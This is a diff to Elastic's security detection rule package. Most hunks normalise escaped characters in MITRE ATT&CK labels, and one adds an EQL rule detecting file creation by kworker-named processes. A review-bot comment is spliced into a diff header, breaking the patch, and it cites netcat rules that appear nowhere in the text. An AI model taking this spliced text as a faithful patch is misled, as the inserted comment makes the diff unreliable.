a/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_1.json +++ b/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_1.json 
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_2.json b/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_2.json
index d1a15a1affc..b5a2d3142a6 100644
--- a/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_2.json
@@ -80,7 +80,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -112,7 +112,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/ae343298-97bc-47bc-9ea2-5f2ad831c16e_1.json b/packages/security_detection_engine/kibana/security_rule/ae343298-97bc-47bc-9ea2-5f2ad831c16e_1.json
new file mode 100644
index 00000000000..a2781b34d55
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/ae343298-97bc-47bc-9ea2-5f2ad831c16e_1.json
@@ -0,0 +1,88 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule monitors for a file creation event originating from a kworker parent process. kworker, or kernel worker, processes are part of the kernel's workqueue mechanism. They are responsible for executing work that has been scheduled to be done in kernel space, which might include tasks like handling interrupts, background activities, and other kernel-related tasks. Attackers may attempt to evade detection by masquerading as a kernel worker process.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Suspicious File Creation via Kworker",
+ "query": "file where event.action == \"creation\" and process.name : \"kworker*\" and not (\n process.name : \"kworker*kcryptd*\" or file.path : (\"/var/log/*\", \"/var/crash/*\")\n)\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "ae343298-97bc-47bc-9ea2-5f2ad831c16e",
+ "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0003",
+ "name": "Persistence",
+ "reference": "https://attack.mitre.org/tactics/TA0003/"
+ },
+ "technique": [
+ {
+ "id": "T1547",
+ "name": "Boot or Logon Autostart Execution",
+ "reference": "https://attack.mitre.org/techniques/T1547/"
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1014",
+ "name": "Rootkit",
+ "reference": "https://attack.mitre.org/techniques/T1014/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 1
+ },
+ "id": "ae343298-97bc-47bc-9ea2-5f2ad831c16e_1",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_1.json b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_1.json
index 9a9a7fded2b..49b648a0fe0 100644
--- a/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_1.json
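Review bot: The new `query` in ae343298-97bc-47bc-9ea2-5f2ad831c16e_1.json carries no OS constraint even though the rule is tagged `OS: Linux`, and its `index` pattern `logs-endpoint.events.*` is not OS-specific; the netcat rules touched earlier in this change pin `host.os.type == "linux"` in every subquery. Prefixing the EQL with `host.os.type == "linux" and ` (and listing `host.os.type` in `required_fields`) would keep the rule from being evaluated against file events from other platforms and make the intended scope explicit. The exclusions for `kworker*kcryptd*` and for `/var/log/*` and `/var/crash/*` have no stated rationale; a sentence in `description` naming them as expected benign kernel-originated writes would help an analyst judge whether the carve-out still fits their environment. Unlike the netcat rules, this rule also ships with no `note` (triage and false-positive guidance) and no `false_positives` entry, which is worth adding for a rule scoring 47 on a dual-tactic mapping.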
+++ b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_1.json
@@ -80,7 +80,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -102,7 +102,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_2.json b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_2.json
index 9a8d4a3b2c7..d51112f1aff 100644
--- a/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_2.json
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -101,7 +101,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_3.json b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_3.json
index 653607c8482..9e97e2e2911 100644
--- a/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_3.json
@@ -80,7 +80,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -102,7 +102,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_1.json b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_1.json
index d1ab60975a6..8364968deb6 100644
--- a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_1.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_2.json b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_2.json
index 3ecbb788d44..8da58bea28c 100644
--- a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_2.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_3.json b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_3.json
index d2825a7722f..166ec244cec 100644
--- a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_3.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_4.json b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_4.json
index 91d7a62a47c..880410515e2 100644
--- a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_4.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_5.json b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_5.json
index d1089dbcb8b..7689bd0d334 100644
--- a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_5.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_1.json b/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_1.json
index 852204bfe43..1ad4eed2144 100644
--- a/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_1.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_2.json b/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_2.json
index d623f7c361a..60bc98c86d2 100644
--- a/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_2.json
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_3.json b/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_3.json
index 54c859fbff8..0708cc1d574 100644
--- a/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_3.json
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_103.json b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_103.json
index 5c43ebfe595..504ab81b585 100644
--- a/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_103.json
@@ -95,7 +95,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_104.json b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_104.json
index 7af05eda06f..aa91fcdbd9f 100644
--- a/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_104.json
@@ -94,7 +94,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_105.json b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_105.json
index 7a8824d653d..edd89675fcb 100644
--- a/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_105.json
@@ -95,7 +95,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_1.json b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_1.json
index fb401f42d77..9a22d52e65e 100644
--- a/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_1.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
@@ -71,7 +71,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -80,7 +80,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_2.json b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_2.json index 5663f683d30..0ffb2280179 100644 --- a/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_2.json +++ b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_2.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -82,7 +82,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -91,7 +91,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_3.json b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_3.json index 34be8727658..56b203e3edc 100644 --- a/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_3.json +++ b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_3.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", 
@@ -82,7 +82,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -91,7 +91,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_1.json b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_1.json index 1f983a5d9ae..bd452eb385a 100644 --- a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_1.json +++ b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_1.json 
@@ -71,7 +71,7 @@ ], "risk_score": 47, "rule_id": "afe6b0eb-dd9d-4922-b08a-1910124d524d", - "setup": "This rule leverages `session` fields, which requires that the collection of session data is enabled for Linux operating systems. The following steps should be performed in order to enable session data event collection on a Linux system. ``` Kibana --\u003e Management --\u003e Fleet --\u003e Agent Policies --\u003e Agent Policy with Elastic Defend installed --\u003e Elastic Defend integration --\u003e Enable the \"Collect session data\" box under \"Event Collection\" for \"Linux\" ``` More information on this topic and how to enable session data collection can be found at https://www.elastic.co/blog/secure-your-cloud-with-cloud-workload-protection-in-elastic-security.", + "setup": "This rule leverages `session` fields, which requires that the collection of session data is enabled for Linux operating systems. The following steps should be performed in order to enable session data event collection on a Linux system. ``` Kibana --> Management --> Fleet --> Agent Policies --> Agent Policy with Elastic Defend installed --> Elastic Defend integration --> Enable the \"Collect session data\" box under \"Event Collection\" for \"Linux\" ``` More information on this topic and how to enable session data collection can be found at https://www.elastic.co/blog/secure-your-cloud-with-cloud-workload-protection-in-elastic-security.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_2.json b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_2.json index 48ac1c97698..b4ca216e999 100644 
--- a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_2.json +++ b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_2.json @@ -71,7 +71,7 @@ ], "risk_score": 47, "rule_id": "afe6b0eb-dd9d-4922-b08a-1910124d524d", - "setup": "This rule leverages `session` fields, which requires that the collection of session data is enabled for Linux operating systems. The following steps should be performed in order to enable session data event collection on a Linux system. ``` Kibana --\u003e Management --\u003e Fleet --\u003e Agent Policies --\u003e Agent Policy with Elastic Defend installed --\u003e Elastic Defend integration --\u003e Enable the \"Collect session data\" box under \"Event Collection\" for \"Linux\" ``` More information on this topic and how to enable session data collection can be found at https://www.elastic.co/blog/secure-your-cloud-with-cloud-workload-protection-in-elastic-security.", + "setup": "This rule leverages `session` fields, which requires that the collection of session data is enabled for Linux operating systems. The following steps should be performed in order to enable session data event collection on a Linux system. ``` Kibana --> Management --> Fleet --> Agent Policies --> Agent Policy with Elastic Defend installed --> Elastic Defend integration --> Enable the \"Collect session data\" box under \"Event Collection\" for \"Linux\" ``` More information on this topic and how to enable session data collection can be found at https://www.elastic.co/blog/secure-your-cloud-with-cloud-workload-protection-in-elastic-security.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", 
diff --git a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_3.json b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_3.json index 1f42ffddaf2..5246c101607 100644 --- a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_3.json +++ b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_3.json @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_4.json b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_4.json index 4b0b99f8d9a..73c02de61b5 100644 --- a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_4.json +++ b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_4.json @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_101.json b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_101.json index 559cf40d302..b8a093741fe 100644 --- a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_101.json +++ b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_101.json 
@@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "b0046934-486e-462f-9487-0d4cf9e429c6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_102.json b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_102.json index 69e23190f16..c1c6303b455 100644 --- a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_102.json 
@@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "b0046934-486e-462f-9487-0d4cf9e429c6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_103.json b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_103.json index 5744fc36791..600b9fc7414 100644 --- a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_103.json 
@@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "b0046934-486e-462f-9487-0d4cf9e429c6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_104.json b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_104.json index a9224c52fd4..17c4165b443 100644 --- a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_104.json 
@@ -44,7 +44,7 @@ ], "risk_score": 47, "rule_id": "b0046934-486e-462f-9487-0d4cf9e429c6", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_102.json b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_102.json index 1c4eace3297..0911bef5529 100644 --- a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_102.json +++ 